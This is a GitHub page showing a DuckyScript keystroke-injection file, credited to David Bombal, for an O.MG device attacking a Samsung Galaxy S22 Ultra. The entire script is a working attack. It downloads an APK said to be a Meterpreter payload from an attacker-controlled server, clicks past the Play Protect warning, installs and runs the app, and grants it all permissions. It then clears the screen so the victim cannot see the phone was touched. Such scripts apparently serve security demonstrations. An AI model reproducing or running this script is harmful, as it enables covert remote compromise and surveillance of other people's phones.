-
Notifications
You must be signed in to change notification settings - Fork 167
/
omg_androidS22Ultra.txt
117 lines (104 loc) · 2.26 KB
/
omg_androidS22Ultra.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
REM # -----------------------------------------------------------
REM # Title: OMG Android Meterpreter
REM # Description: Download and install an APK on Android.
REM # You may need to change the script for your particular phone
REM # model and Android version. Play around with it. Delays are very
REM # important and makes a really big difference.
REM #
REM # Author: David Bombal
REM # Target: Android 12 (Samsung Galaxy S22 Ultra)
REM # Notes: Set URL for APK payload below
REM # -----------------------------------------------------------
REM # -----------------------------------------------------------
REM # clear screen (Not needed, but helps for demos)
REM # -----------------------------------------------------------
GUI ENTER
DELAY 1000
GUI ENTER
REM # -----------------------------------------------------------
REM # launch browser and download apk
REM # -----------------------------------------------------------
GUI b
DELAY 1000
CTRL l
STRING http://xx.xx.xx.xx:8000/omg.apk
ENTER
DELAY 4000
ENTER
DELAY 2000
REM # -----------------------------------------------------------
REM # open apk with My Files
REM # -----------------------------------------------------------
GUI r
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
ENTER
DELAY 100
ENTER
DELAY 100
TAB
DELAY 100
ENTER
REM # -----------------------------------------------------------
REM # blocked by Play Protect
REM # -----------------------------------------------------------
DELAY 100
TAB
DELAY 1000
TAB
DELAY 1000
ENTER
DELAY 1000
TAB
DELAY 1000
TAB
DELAY 1000
ENTER
REM # -----------------------------------------------------------
REM # Run App
REM # -----------------------------------------------------------
DELAY 8000
ENTER
REM # -----------------------------------------------------------
REM # Give Access to All
REM # -----------------------------------------------------------
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
ENTER
DELAY 500
TAB
ENTER
REM # -----------------------------------------------------------
REM # clear screen (So they can't see we were on their phone)
REM # -----------------------------------------------------------
GUI ENTER
DELAY 1000
GUI ENTER